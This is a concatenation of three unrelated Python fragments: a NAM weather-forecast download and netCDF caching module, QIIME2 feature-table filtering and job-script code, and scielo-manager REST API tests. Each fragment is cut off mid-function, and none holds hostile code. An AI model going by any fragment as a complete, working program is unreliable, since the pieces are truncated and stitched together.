'VGRD_TRO': {'standard_name':'northward_wind', 'units':'m/s'},
'VIS_SFC': {'standard_name':'visibility', 'units':'m'},
'VVEL_ISBL': {'standard_name':'vertical_air_velocity_expressed_as_tendency_of_pressure',
'units':'Pa/s'},
# Coordinates
# I couldn't find standard names for all of the layers...
# I'm not sure if both forecast and reftime should be marked as axis T...
'x': {'axis':'X', 'standard_name':'projection_x_coordinate', 'units':'m'},
'y': {'axis':'Y', 'standard_name':'projection_y_coordinate', 'units':'m'},
'z_CBL': {'axis':'Z', 'standard_name':'cloud_base'},
'z_HYBL': {'axis':'Z', 'standard_name':'atmosphere_hybrid_sigma_pressure_coordinate'},
'z_TOA': {'axis':'Z', 'standard_name':'toa'},
'z_SFC': {'axis':'Z', 'standard_name':'surface'},
'z_SIGY': {'axis':'Z', 'standard_name':'atmosphere_sigma_coordinate'},
'z_TRO': {'axis':'Z', 'standard_name':'tropopause'},
'z_SPDY': {'axis':'Z', 'long_name':'specified pressure difference', 'units':'Pa'},
'z_HTGL1': {'axis':'Z', 'long_name':'fixed_height_above_ground', 'units':'m'},
'z_HTGL2': {'axis':'Z', 'long_name':'fixed_height_above_ground', 'units':'m'},
'z_HTGL3': {'axis':'Z', 'long_name':'fixed_height_above_ground', 'units':'m'},
'z_ISBL': {'axis':'Z', 'long_name':'isobaric_level', 'units':'Pa'},
'z_0DEG': {'axis':'Z', 'long_name':'0_degree_C_isotherm'},
'z_EATM': {'axis':'Z', 'long_name':'entire_atmosphere'},
'z_LLTW': {'axis':'Z', 'long_name':'lowest_level_of_the_wet_bulb_zero'},
'z_MWSL': {'axis':'Z', 'long_name':'max_wind_surface_layer'},
'forecast': {'axis':'T', 'standard_name':'forecast_period', 'units':'hours'},
'reftime': {'axis':'T', 'standard_name':'forecast_reference_time', 'units':'hours since 1970-01-01T00:00'},
'lat': {'standard_name':'latitude', 'units':'degree_north'},
'lon': {'standard_name':'longitude', 'units':'degree_east'},
}
for v in metadata:
ds[v] = ds[v].assign_attrs(metadata[v])
now = apollo.Timestamp('now')
ds.attrs['title'] = 'NAM-UGA, a subset of NAM-NMM for solar forecasting research in Georgia'
ds.attrs['history'] = f'{now.isoformat()} Initial conversion from GRIB files released by NCEP\n'
ds = xr.decode_cf(ds)
return ds
def _open_dataset(paths):
'''Open one or more netCDF files as a single dataset.
This is a wrapper around :func:`xarray.open_mfdataset` providing defaults
relevant to Apollo's filesystem layout.
Arguments:
paths (str or pathlib.Path or list):
One or more paths to the datasets.
Returns:
xarray.Dataset:
The combined dataset.
'''
if isinstance(paths, (str, Path)):
paths = [paths]
# Xarray and libnetcdf sometimes send trash to stdout or stderr.
# We completly silence both streams temporarily.
with builtins.open('/dev/null', 'w') as dev_null:
with contextlib.redirect_stdout(dev_null):
with contextlib.redirect_stderr(dev_null):
return xr.open_mfdataset(paths, combine='by_coords')
def download(reftime='now', save_nc=True, keep_gribs=False, force=False, **kwargs):
'''Download a forecast.
The download is skipped for GRIB files in the cache.
Arguments:
reftime (timestamp):
The reference time to open.
save_nc (bool or None):
Whether to save the processed forecast in the cache as a netCDF.
keep_gribs (bool or None):
Whether to save the raw forecast in the cache as a set of GRIBs.
force (bool):
If true, download even if the dataset already exists locally.
max_tries (int):
The maximum number of failed downloads for a single file
before raising an `IOError`. Exponential backoff is applied
between attempts, starting at 1 second.
timeout (int):
The network timeout in seconds. The government servers are often
slow to respond.
fail_fast (bool):
If true, the download errors are treated as fatal.
This overrides the `max_tries` argument.
Returns:
xarray.Dataset:
A dataset for the forecast at this reftime.
'''
# No need to download if we already have the dataset.
if not force and nc_path(reftime).exists():
logger.info(f'skipping downlod, file exists: {nc_path(reftime)}')
return open(reftime, on_miss='raise')
# We save each GRIB as a netCDF in a temp directory, then reopen all
# as a single dataset, which we finally persist in the datastore.
# It is important to persist the intermediate datasets for performance
# and memory usage.
with TemporaryDirectory() as tmpdir:
tmpdir = Path(tmpdir)
paths = []
for forecast in FORECAST_PERIOD:
path = tmpdir / f'{forecast}.nc'
ds = _download_grib(reftime, forecast)
ds = _process_grib(ds, reftime, forecast)
ds.to_netcdf(path)
paths.append(path)
ds = _open_dataset(paths)
if save_nc:
path = nc_path(reftime)
logger.info(f'writing {path}')
ds.to_netcdf(path)
ds = _open_dataset([path])
if not keep_gribs:
for forecast in FORECAST_PERIOD:
path = grib_path(reftime, forecast)
logger.info(f'deleting {path}')
path.unlink()
return ds
def open(reftimes='now', on_miss='raise', **kwargs):
'''Open a forecast for one or more reference times.
Arguments:
reftimes (timestamp or sequence):
The reference time(s) to open. The default is to load the most
recent forecast.
on_miss ('raise' or 'download' or 'skip'):
Determines the behavior on a cache miss:
- ``'raise'``: Raise a :class:`CacheMiss` exception.
- ``'download'``: Attempt to download the missing forecast.
- ``'skip'``: Skip missing forecasts. This mode will raise a
:class:`CacheMiss` exception only if the resulting dataset
would be empty.
**kwargs:
Additional keyword arguments are forwarded to :func:`download`.
Returns:
xarray.Dataset:
A single dataset containing all forecasts at the given reference
times.
'''
if not on_miss in ('raise', 'download', 'skip'):
raise ValueError(f"Unknown cache miss strategy: {repr(on_miss)}")
try:
| |
# ----------------------------------------------------------------------------
# Copyright (c) 2020, <NAME>.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file LICENSE, distributed with this software.
# ----------------------------------------------------------------------------
import sys
import yaml
import itertools
import numpy as np
import pandas as pd
from os.path import isfile, splitext
import plotly
import plotly.graph_objs as go
from routine_qiime2_analyses._routine_q2_xpbs import run_xpbs, print_message
from routine_qiime2_analyses._routine_q2_io_utils import (
read_yaml_file, get_job_folder, get_fps, get_raref_tab_meta_pds,
get_raref_table, simple_chunks, get_analysis_folder, filter_mb_table,
filter_non_mb_table)
from routine_qiime2_analyses._routine_q2_cmds import run_import
from routine_qiime2_analyses._routine_q2_mmvec import get_mmvec_dicts
from routine_qiime2_analyses._routine_q2_songbird import get_songbird_dicts
def import_datasets(
i_datasets_folder: str, datasets: dict, datasets_phylo: dict,
force: bool, prjct_nm: str, qiime_env: str, chmod: str,
noloc: bool, run_params: dict, filt_raref: str, jobs: bool,
slurm: bool, chunkit: int) -> None:
"""Initial imports of the .tsv datasets in to Qiime2 Artefacts
Parameters
----------
i_datasets_folder : str
Names identifying the datasets in the input folder
datasets : dict
Mapping dataset name -> [data file path, metadata file path]
datasets_phylo : dict
Mapping dataset name -> ('tree_to_use', 'corrected_or_not')
force : bool
Force the re-writing of scripts for all commands
prjct_nm : str
Nick name for the project.
qiime_env : str
Name of a qiime2 conda environment where analysis
tools to be run are installed
chmod : str
noloc : bool
run_params : dict
filt_raref : str
jobs : bool
chunkit : int
Returns
-------
"""
job_folder = get_job_folder(i_datasets_folder, 'import_tables')
job_folder2 = get_job_folder(i_datasets_folder, 'import_tables/chunks')
to_chunk = []
main_written = 0
run_pbs = '%s/0_run_import_%s%s.sh' % (job_folder, prjct_nm, filt_raref)
with open(run_pbs, 'w') as o:
for dat, tsv_meta_pds_ in datasets.items():
written = 0
out_sh = '%s/0_run_import_%s_%s%s.sh' % (
job_folder2, prjct_nm, dat, filt_raref)
if slurm:
out_pbs = '%s.slm' % splitext(out_sh)[0]
else:
out_pbs = '%s.pbs' % splitext(out_sh)[0]
with open(out_sh, 'w') as cur_sh:
for tsv_meta_pds in tsv_meta_pds_: # REMOVE IF FIXED NOT KEPT
tsv, meta = tsv_meta_pds
qza = '%s.qza' % splitext(tsv)[0]
if datasets_phylo[dat][1]:
cmd = run_import(tsv, qza, 'FeatureTable[Frequency]')
cur_sh.write('echo "%s"\n' % cmd)
cur_sh.write('%s\n' % cmd)
written += 1
elif force or not isfile(qza):
cmd = run_import(tsv, qza, 'FeatureTable[Frequency]')
cur_sh.write('echo "%s"\n' % cmd)
cur_sh.write('%s\n' % cmd)
written += 1
if written:
main_written += 1
to_chunk.append(out_sh)
if not chunkit:
job_name = '%s.mprt.%s%s' % (prjct_nm, dat, filt_raref)
run_xpbs(
out_sh, out_pbs, job_name, qiime_env,
run_params["time"], run_params["n_nodes"],
run_params["n_procs"], run_params["mem_num"],
run_params["mem_dim"], chmod, written, 'single',
o, noloc, slurm, jobs
)
if to_chunk and chunkit:
simple_chunks(
run_pbs, job_folder2, to_chunk, 'imports', prjct_nm,
run_params["time"], run_params["n_nodes"], run_params["n_procs"],
run_params["mem_num"], run_params["mem_dim"], qiime_env, chmod,
noloc, slurm, jobs, chunkit, None
)
if main_written:
print_message('# Import tables to qiime2', 'sh', run_pbs, jobs)
# def get_threshs(p_filt_threshs):
# if not isfile(p_filt_threshs):
# print('yaml file for filtering thresholds does not exist:\n%s\nExiting...' % p_filt_threshs)
# sys.exit(0)
# with open(p_filt_threshs) as handle:
# try:
# threshs_d = yaml.load(handle, Loader=yaml.FullLoader)
# except AttributeError:
# threshs_d = yaml.load(handle)
# return threshs_d
def deleted_non_filt(datasets: dict, datasets_read: dict, datasets_features: dict,
datasets_phylo: dict, datasets_rarefs: dict, taxonomies: dict,
datasets_filt: dict, datasets_filt_map: dict):
for d in [datasets, datasets_read, datasets_features,
datasets_phylo, datasets_rarefs, taxonomies]:
to_delete = []
for dat in d:
if dat not in datasets_filt_map and dat in datasets_filt:
to_delete.append(dat)
for delete in to_delete:
d.pop(delete)
break
def get_thresholds(threshs_d: dict) -> tuple:
"""
Parameters
----------
threshs_d : dict
Thresholds configs
Returns
-------
names : list
Name for the threshold
thresh_sam : int
Samples threshold
thresh_feat : int
Features threshold
"""
names = []
if 'names' in threshs_d:
names = threshs_d['names']
thresh_sam = 0
if 'samples' in threshs_d:
thresh_sam = threshs_d['samples']
thresh_feat = 0
if 'features' in threshs_d:
thresh_feat = threshs_d['features']
return names, thresh_sam, thresh_feat
def no_filtering(
dat: str,
thresh_sam: int,
thresh_feat: int) -> bool:
"""Checks whether to skip filtering or not.
Parameters
----------
dat : str
Dataset name
thresh_sam : int
Samples threshold
thresh_feat : int
Features threshold
Returns
-------
skip : bool
Whether to skip filtering or not
"""
skip = False
if not thresh_sam and not thresh_feat:
print('Filtering threshold(s) of 0 do nothing: skipping...')
skip = True
thresh_sam_is_numeric = isinstance(thresh_sam, (float, int))
thresh_feat_is_numeric = isinstance(thresh_feat, (float, int))
if not thresh_sam_is_numeric or not thresh_feat_is_numeric:
print('Filtering threshold for %s not a '
'integer/float: skipping...' % dat)
skip = True
if thresh_sam < 0 or thresh_feat < 0:
print('Filtering threshold must be positive: skipping...')
skip = True
return skip
def get_dat_filt(
dat: str,
names: list,
thresh_sam: int,
thresh_feat: int) -> str:
"""Get a build-up new name for
the filtered version of a dataset.
Parameters
----------
dat : str
Dataset name
names : list
Name for the threshold
thresh_sam : int
Samples threshold
thresh_feat : int
Features threshold
Returns
-------
dat_filt : str
New dataset name for the filtered version
"""
dat_filt = []
if names:
dat_filt.append('%srm' % len(names))
if thresh_sam:
if thresh_sam > 1:
dat_filt.append('minSam%s' % thresh_sam)
else:
dat_filt.append('minSam%s' % str(thresh_sam).replace('.', ''))
if thresh_feat:
if thresh_feat > 1:
dat_filt.append('minFeat%s' % thresh_feat)
else:
dat_filt.append('minFeat%s' % str(thresh_feat).replace('.', ''))
dat_filt = '%s_%s' % (dat, '-'.join(dat_filt))
return dat_filt
def get_applied_thresholds_text(threshs_d: dict) -> tuple:
"""
Parameters
----------
threshs_d : dict
Thresholds configs
Returns
-------
names : list
Name for the threshold
thresh_sam : int
Samples threshold
thresh_feat : int
Features threshold
"""
names = []
if 'names' in threshs_d:
names = threshs_d['names']
thresh_sam = 0
if 'samples' in threshs_d:
thresh_sam = threshs_d['samples']
thresh_feat = 0
if 'features' in threshs_d:
thresh_feat = threshs_d['features']
return names, thresh_sam, thresh_feat
def filtering_names(
names: list,
tab_filt_pd: pd.DataFrame):
"""
Parameters
----------
names : list
Name for the threshold
tab_filt_pd : pd.DataFrame
Input raw feature table
"""
if names:
names_in = list(set(tab_filt_pd.columns) & set(names))
tab_filt_pd.drop(columns=names_in, inplace=True)
def filtering_samples(
thresh_sam: int,
tab_filt_pd: pd.DataFrame):
"""
Parameters
----------
thresh_sam : int
Samples threshold
tab_filt_pd : pd.DataFrame
Input feature table
"""
if thresh_sam:
samples = tab_filt_pd.columns
if thresh_sam > 1:
to_drop = samples[tab_filt_pd.sum(0) < thresh_sam]
else:
tab_perc_min = tab_filt_pd.sum(0).mean() * thresh_sam
to_drop = samples[tab_filt_pd.sum(0) < tab_perc_min]
if to_drop.size:
tab_filt_pd.drop(columns=to_drop, inplace=True)
def filtering_features(
thresh_feat: int,
tab_filt_pd: pd.DataFrame):
"""
Parameters
----------
thresh_feat : int
Features threshold
tab_filt_pd : pd.DataFrame
Input feature table
"""
if thresh_feat:
if thresh_feat > 1:
tab_filt_rm = tab_filt_pd < thresh_feat
else:
tab_perc = tab_filt_pd / tab_filt_pd.sum(0)
tab_filt_rm = tab_perc < thresh_feat
tab_filt_pd[tab_filt_rm] = 0
def filtering_thresholds(
names: list,
thresh_sam: int,
thresh_feat: int,
tab_pd: pd.DataFrame) -> tuple:
"""
Parameters
----------
names : list
Name for the threshold
thresh_sam : int
Samples threshold
thresh_feat : int
Features threshold
tab_pd : pd.DataFrame
Input raw feature table
Returns
-------
tab_filt_pd : pd.DataFrame
Output filtered feature table
"""
tab_filt_pd = tab_pd.copy()
filtering_names(names, tab_filt_pd)
filtering_samples(thresh_sam, tab_filt_pd)
filtering_features(thresh_feat, tab_filt_pd)
tab_filt_pd = tab_filt_pd.loc[tab_filt_pd.sum(1) > 0, :]
tab_filt_pd = tab_filt_pd.loc[:, tab_filt_pd.sum(0) > 0]
return tab_filt_pd
def harsh_filtering(
dat_filt: str,
tab_filt_pd: pd.DataFrame) -> bool:
"""
Parameters
----------
dat_filt : str
New dataset name for the filtered version
tab_filt_pd : pd.DataFrame
Filtered feature table
Returns
-------
skip : bool
Whether to skip a too harsh filtering
"""
skip = False
if tab_filt_pd.shape[0] < 10 or tab_filt_pd.shape[1] < 2:
print('Filtering too harsh (no more data for %s): '
'skipping...' % dat_filt)
skip = True
return skip
def filter_rare_samples(
i_datasets_folder: str, datasets: dict, datasets_read: dict,
datasets_features: dict, datasets_rarefs: dict, datasets_filt: dict,
datasets_filt_map: dict, datasets_phylo: dict, prjct_nm: str,
qiime_env: str, p_filt_threshs: str, chmod: str, noloc: bool,
run_params: dict, filt_raref: str, jobs: bool, slurm: bool,
chunkit: int) -> None:
"""
Filter the rare features, keep samples with enough reads/features and import to Qiime2.
:param i_datasets_folder: Path to the folder containing the data/metadata subfolders.
:param datasets: dataset -> [tsv/biom path, meta path]
:param datasets_read: dataset -> [tsv table, meta table]
:param datasets_features: dataset -> list of features names in the dataset tsv / biom file.
:param datasets_phylo: to be updated with ('tree_to_use', 'corrected_or_not') per dataset.
:param prjct_nm: Short nick name for your project.
:param qiime_env: name of your qiime2 conda environment (e.g. qiime2-2019.10).
:param thresh: min number of reads per sample to keep it.
:param chmod: whether to change permission of output files (defalt: 775).
"""
threshs_dats = read_yaml_file(p_filt_threshs)
written = 0
datasets_update = {}
datasets_read_update = {}
datasets_features_update = {}
datasets_phylo_update = {}
job_folder = get_job_folder(i_datasets_folder, 'import_filtered')
out_sh = '%s/1_run_import_filtered_%s%s.sh' % (job_folder, prjct_nm, filt_raref)
if slurm:
out_pbs = '%s.slm' % splitext(out_sh)[0]
else:
out_pbs = '%s.pbs' % splitext(out_sh)[0]
to_chunk = []
with open(out_sh, 'w') as sh:
for dat, tab_meta_pds_ in datasets_read.items():
if dat | |
<reponame>patymori/scielo-manager
#coding: utf-8
import json
import datetime
from django_webtest import WebTest
from django_factory_boy import auth
from journalmanager.tests import modelfactories
from editorialmanager.tests import modelfactories as editorial_modelfactories
from api.resources_v2 import (
JournalResource,
IssueResource,
)
def _make_auth_environ(username, token):
return {'HTTP_AUTHORIZATION': 'ApiKey {0}:{1}'.format(username, token)}
def _makePermission(perm, model, app_label='journalmanager'):
"""
Retrieves a Permission according to the given model and app_label.
"""
from django.contrib.contenttypes import models
from django.contrib.auth import models as auth_models
ct = models.ContentType.objects.get(model=model,
app_label=app_label)
return auth_models.Permission.objects.get(codename=perm, content_type=ct)
def _makeUseLicense():
from journalmanager.models import UseLicense
ul = UseLicense(license_code='TEST')
ul.save()
class JournalRestAPITest(WebTest):
def setUp(self):
self.user = auth.UserF(is_active=True)
self.extra_environ = _make_auth_environ(self.user.username,
self.user.api_key.key)
_makeUseLicense()
def test_journal_index(self):
response = self.app.get('/api/v2/journals/',
extra_environ=self.extra_environ)
self.assertEqual(response.status_code, 200)
self.assertTrue('objects' in response.content)
def test_journal_filters(self):
resource_filters = JournalResource().Meta
mandatory_filters = ['is_trashed']
for fltr in mandatory_filters:
self.assertTrue(fltr in resource_filters.filtering)
def test_journal_getone(self):
col = modelfactories.CollectionFactory()
journal = modelfactories.JournalFactory.create()
journal.join(col, self.user)
response = self.app.get('/api/v2/journals/%s/' % journal.pk,
extra_environ=self.extra_environ)
self.assertEqual(response.status_code, 200)
self.assertTrue('title' in response.content)
def test_post_data_index(self):
response = self.app.post('/api/v2/journals/',
extra_environ=self.extra_environ, status=405)
self.assertEqual(response.status_code, 405)
def test_put_data_index(self):
response = self.app.put('/api/v2/journals/',
extra_environ=self.extra_environ, status=405)
self.assertEqual(response.status_code, 405)
def test_del_data_index(self):
response = self.app.delete('/api/v2/journals/',
extra_environ=self.extra_environ, status=405)
self.assertEqual(response.status_code, 405)
def test_post_data_getone(self):
journal = modelfactories.JournalFactory.create()
response = self.app.post('/api/v2/journals/%s/' % journal.pk,
extra_environ=self.extra_environ, status=405)
self.assertEqual(response.status_code, 405)
def test_put_data_getone(self):
journal = modelfactories.JournalFactory.create()
response = self.app.put('/api/v2/journals/%s/' % journal.pk,
extra_environ=self.extra_environ, status=405)
self.assertEqual(response.status_code, 405)
def test_del_data_getone(self):
journal = modelfactories.JournalFactory.create()
response = self.app.delete('/api/v2/journals/%s/' % journal.pk,
extra_environ=self.extra_environ, status=405)
self.assertEqual(response.status_code, 405)
def test_access_denied_for_unauthorized_users(self):
response = self.app.get('/api/v2/journals/',
status=401)
self.assertEqual(response.status_code, 401)
def test_list_all_journals_by_collection(self):
collection = modelfactories.CollectionFactory()
journal1 = modelfactories.JournalFactory.create()
journal2 = modelfactories.JournalFactory.create()
journal1.join(collection, self.user)
journal2.join(collection, self.user)
response = self.app.get('/api/v2/journals/?collection=%s' % collection.name,
extra_environ=self.extra_environ)
self.assertEqual(response.status_code, 200)
self.assertTrue('objects' in response.content)
def test_api_datamodel(self):
col = modelfactories.CollectionFactory()
journal = modelfactories.JournalFactory.create()
journal.join(col, self.user)
response = self.app.get('/api/v2/journals/%s/' % journal.pk,
extra_environ=self.extra_environ)
expected_keys = [
u'editor_address',
u'copyrighter',
u'editor_address_city',
u'editor_address_state',
u'creator',
u'ctrl_vocabulary',
u'national_code',
u'updated',
u'frequency',
u'url_journal',
u'short_title',
u'final_num',
u'logo',
u'publisher_country',
u'publisher_name',
u'eletronic_issn',
u'issues',
u'url_online_submission',
u'init_vol',
u'subject_descriptors',
u'title',
u'pub_status_history',
u'id',
u'final_year',
u'editorial_standard',
u'languages',
u'scielo_issn',
u'collections',
u'index_coverage',
u'secs_code',
u'init_year',
u'sections',
u'is_indexed_aehci',
u'use_license',
u'other_titles',
u'editor_address_country',
u'acronym',
u'publisher_state',
u'is_indexed_scie',
u'sponsors',
u'abstract_keyword_languages',
u'editor_name',
u'other_previous_title',
u'study_areas',
u'medline_code',
u'is_trashed',
u'init_num',
u'publication_city',
u'pub_level',
u'is_indexed_ssci',
u'missions',
u'editor_email',
u'created',
u'medline_title',
u'final_vol',
u'cover',
u'editor_phone2',
u'editor_phone1',
u'print_issn',
u'editor_address_zip',
u'contact',
u'pub_status',
u'pub_status_reason',
u'title_iso',
u'notes',
u'resource_uri',
u'previous_ahead_documents',
u'current_ahead_documents',
u'twitter_user',
u'previous_title',
u'succeeding_title',
u'subject_categories'
]
json_keys = set(response.json.keys())
expected_keys = set(expected_keys)
# looks for unexpected fields
self.assertFalse(json_keys.difference(expected_keys))
# make sure all expected fields are present
for key in expected_keys:
self.assertEqual(True, key in json_keys)
def test_api_collections_data(self):
col1 = modelfactories.CollectionFactory()
col2 = modelfactories.CollectionFactory()
journal = modelfactories.JournalFactory.create()
journal.join(col1, self.user)
journal.join(col2, self.user)
response = self.app.get('/api/v2/journals/%s/' % journal.pk,
extra_environ=self.extra_environ)
expected_collections = [col1.name, col2.name]
self.assertEqual(response.json['collections'], expected_collections)
def test_filter_by_pubstatus(self):
col = modelfactories.CollectionFactory()
journal = modelfactories.JournalFactory.create()
journal.join(col, self.user)
journal.change_status(col, 'current', 'testing', self.user)
journal2 = modelfactories.JournalFactory.create()
journal2.join(col, self.user)
journal2.change_status(col, 'deceased', 'testing', self.user)
response = self.app.get('/api/v2/journals/?pubstatus=current',
extra_environ=self.extra_environ)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(json.loads(response.content)['objects']), 1)
def test_filter_by_pubstatus_many_values(self):
col = modelfactories.CollectionFactory()
journal = modelfactories.JournalFactory.create()
journal.join(col, self.user)
journal.change_status(col, 'current', 'testing', self.user)
journal2 = modelfactories.JournalFactory.create()
journal2.join(col, self.user)
journal2.change_status(col, 'deceased', 'testing', self.user)
response = self.app.get('/api/v2/journals/?pubstatus=current&pubstatus=deceased',
extra_environ=self.extra_environ)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(json.loads(response.content)['objects']), 2)
def test_filter_by_pubstatus_many_values_filtering_by_collection(self):
col = modelfactories.CollectionFactory()
col2 = modelfactories.CollectionFactory()
journal = modelfactories.JournalFactory.create()
journal.join(col, self.user)
journal.change_status(col, 'current', 'testing', self.user)
journal2 = modelfactories.JournalFactory.create()
journal2.join(col2, self.user)
journal2.change_status(col2, 'deceased', 'testing', self.user)
response = self.app.get('/api/v2/journals/?pubstatus=current&pubstatus=deceased&collection=%s' % col.name,
extra_environ=self.extra_environ)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(json.loads(response.content)['objects']), 1)
def test_filter_print_issn(self):
col = modelfactories.CollectionFactory()
journal = modelfactories.JournalFactory.create(print_issn='1234-1234')
journal.join(col, self.user)
journal2 = modelfactories.JournalFactory.create(print_issn='4321-4321')
journal2.join(col, self.user)
response = self.app.get('/api/v2/journals/?print_issn=1234-1234',
extra_environ=self.extra_environ)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(json.loads(response.content)['objects']), 1)
self.assertEqual(json.loads(response.content)['objects'][0]['print_issn'], '1234-1234')
def test_filter_eletronic_issn(self):
col = modelfactories.CollectionFactory()
journal = modelfactories.JournalFactory.create(eletronic_issn='1234-1234')
journal.join(col, self.user)
journal2 = modelfactories.JournalFactory.create(eletronic_issn='4321-4321')
journal2.join(col, self.user)
response = self.app.get('/api/v2/journals/?eletronic_issn=1234-1234',
extra_environ=self.extra_environ)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(json.loads(response.content)['objects']), 1)
self.assertEqual(json.loads(response.content)['objects'][0]['eletronic_issn'], '1234-1234')
def test_succeding_title(self):
col = modelfactories.CollectionFactory()
col.add_user(self.user)
journal1 = modelfactories.JournalFactory.create(title='Previous Title')
journal1.join(col, self.user)
journal2 = modelfactories.JournalFactory.create(title='Succeeding Title', previous_title=journal1)
journal2.join(col, self.user)
response = self.app.get(
'/api/v2/journals/%s/' % journal1.pk,
extra_environ=self.extra_environ).json
self.assertEqual(
response['succeeding_title'],
'/api/v2/journals/%s/' % journal2.pk)
def test_without_succeding_title(self):
col = modelfactories.CollectionFactory()
col.add_user(self.user)
journal1 = modelfactories.JournalFactory.create(title='Previous Title')
journal1.join(col, self.user)
response = self.app.get(
'/api/v2/journals/%s/' % journal1.pk,
extra_environ=self.extra_environ).json
self.assertEqual(
response['succeeding_title'], None)
def test_api_pub_status_data(self):
col = modelfactories.CollectionFactory()
journal = modelfactories.JournalFactory.create()
journal.join(col, self.user)
response = self.app.get('/api/v2/journals/%s/' % journal.pk,
extra_environ=self.extra_environ).json
self.assertEqual(response['pub_status'], {col.name:
journal.membership_info(collection=col, attribute='status')})
def test_api_pub_status_data_with_multiple_collection(self):
col1 = modelfactories.CollectionFactory()
col2 = modelfactories.CollectionFactory()
journal = modelfactories.JournalFactory.create()
journal.join(col1, self.user)
journal.join(col2, self.user)
#Change status of journal on collection 1
journal.change_status(col1, 'current',
'The journal passed on SciELO evaluation', self.user)
response = self.app.get('/api/v2/journals/%s/' % journal.pk,
extra_environ=self.extra_environ).json
self.assertEqual(response['pub_status'],
{col.name:journal.membership_info(collection=col, attribute='status')
for col in journal.collections.all()})
def test_api_pub_status_history_data(self):
col1 = modelfactories.CollectionFactory()
col2 = modelfactories.CollectionFactory()
journal = modelfactories.JournalFactory.create()
journal.join(col1, self.user)
journal.join(col2, self.user)
response = self.app.get('/api/v2/journals/%s/' % journal.pk,
extra_environ=self.extra_environ).json
expected_history = []
for history in journal.statuses.order_by('-since').all():
expected_history.append({'date': history.since.strftime('%Y-%m-%dT%H:%M:%S.%f'), 'status': history.status})
self.assertEqual(response['pub_status_history'],
expected_history)
class CollectionRestAPITest(WebTest):
def setUp(self):
self.user = auth.UserF(is_active=True)
self.extra_environ = _make_auth_environ(self.user.username,
self.user.api_key.key)
def test_index(self):
modelfactories.CollectionFactory.create()
response = self.app.get('/api/v2/collections/',
extra_environ=self.extra_environ)
self.assertEqual(response.status_code, 200)
self.assertTrue('objects' in response.content)
def test_post_data(self):
response = self.app.post('/api/v2/collections/',
extra_environ=self.extra_environ, status=405)
self.assertEqual(response.status_code, 405)
def test_put_data(self):
response = self.app.put('/api/v2/collections/',
extra_environ=self.extra_environ, status=405)
self.assertEqual(response.status_code, 405)
def test_del_data(self):
response = self.app.delete('/api/v2/collections/',
extra_environ=self.extra_environ, status=405)
self.assertEqual(response.status_code, 405)
def test_getone(self):
collection = modelfactories.CollectionFactory.create()
response = self.app.get('/api/v2/collections/%s/' % collection.pk,
extra_environ=self.extra_environ)
self.assertEqual(response.status_code, 200)
self.assertTrue('name' in response.content)
def test_post_data_getone(self):
collection = modelfactories.CollectionFactory.create()
response = self.app.post('/api/v2/collections/%s/' % collection.pk,
extra_environ=self.extra_environ, status=405)
self.assertEqual(response.status_code, 405)
def test_put_data_getone(self):
collection = modelfactories.CollectionFactory.create()
response = self.app.put('/api/v2/collections/%s/' % collection.pk,
extra_environ=self.extra_environ, status=405)
self.assertEqual(response.status_code, 405)
def test_del_data_getone(self):
collection = modelfactories.CollectionFactory.create()
response = self.app.delete('/api/v2/collections/%s/' % collection.pk,
extra_environ=self.extra_environ, status=405)
self.assertEqual(response.status_code, 405)
def test_api_v2_datamodel(self):
collection = modelfactories.CollectionFactory.create()
response = self.app.get('/api/v2/collections/%s/' % collection.pk,
extra_environ=self.extra_environ)
expected_keys = [
u'city',
u'fax',
u'address_complement',
u'address_number',
u'acronym',
u'country',
u'zip_code',
u'id',
u'phone',
u'state',
u'name_slug',
u'url',
u'address',
u'logo',
u'resource_uri',
u'email',
u'name'
]
self.assertEqual(response.json.keys(), expected_keys)
def test_access_denied_for_unathorized_users(self):
modelfactories.CollectionFactory.create()
response = self.app.get('/api/v2/collections/', status=401)
self.assertEqual(response.status_code, 401)
class IssuesRestAPITest(WebTest):
def setUp(self):
self.user = auth.UserF(is_active=True)
self.extra_environ = _make_auth_environ(self.user.username, self.user.api_key.key)
def test_issue_index(self):
modelfactories.IssueFactory.create()
response = self.app.get('/api/v2/issues/', extra_environ=self.extra_environ)
self.assertEqual(response.status_code, 200)
self.assertTrue('objects' in response.content)
def test_issue_filters(self):
resource_filters = IssueResource().Meta
mandatory_filters = ['journal', 'is_marked_up']
for fltr in mandatory_filters:
self.assertTrue(fltr in resource_filters.filtering)
def test_post_data(self):
modelfactories.IssueFactory.create()
response = self.app.post('/api/v2/issues/', extra_environ=self.extra_environ, status=405)
self.assertEqual(response.status_code, 405)
def test_put_data(self):
modelfactories.IssueFactory.create()
response = self.app.put('/api/v2/issues/', extra_environ=self.extra_environ, status=405)
self.assertEqual(response.status_code, 405)
def test_del_data(self):
modelfactories.IssueFactory.create()
response = self.app.delete('/api/v2/issues/', extra_environ=self.extra_environ, status=405)
self.assertEqual(response.status_code, 405)
def test_issue_getone(self):
issue = modelfactories.IssueFactory.create()
response = self.app.get('/api/v2/issues/%s/' % issue.pk, extra_environ=self.extra_environ)
self.assertEqual(response.status_code, 200)
self.assertTrue('number' in response.content)
def test_post_data_getone(self):
issue = modelfactories.IssueFactory.create()
response = self.app.post('/api/v2/issues/%s/' % issue.pk, extra_environ=self.extra_environ, status=405)
self.assertEqual(response.status_code, 405)
def test_put_data_getone(self):
issue = modelfactories.IssueFactory.create()
response = self.app.put('/api/v2/issues/%s/' % issue.pk, extra_environ=self.extra_environ, status=405)
self.assertEqual(response.status_code, 405)
def test_del_data_getone(self):
issue = modelfactories.IssueFactory.create()
response = self.app.delete('/api/v2/issues/%s/' % issue.pk, extra_environ=self.extra_environ, status=405)
self.assertEqual(response.status_code, 405)
def test_api_v2_datamodel(self):
issue = modelfactories.IssueFactory.create()
response = self.app.get('/api/v2/issues/%s/' % issue.pk, extra_environ=self.extra_environ)
expected_keys = [
u'ctrl_vocabulary',
u'number',
u'total_documents',
u'label',
u'id',
u'publication_start_month',
u'suppl_number',
u'publication_end_month',
u'editorial_standard',
u'sections',
u'spe_text',
u'updated',
u'suppl_volume',
u'journal',
u'volume',
u'is_trashed',
u'is_marked_up',
u'created',
u'cover',
u'publication_year',
u'order',
u'resource_uri',
u'thematic_titles',
u'suppl_text',
u'type',
u'use_license'
]
self.assertEqual(sorted(response.json.keys()), sorted(expected_keys))
def test_access_denied_for_unauthenticated_users(self):
modelfactories.IssueFactory.create()
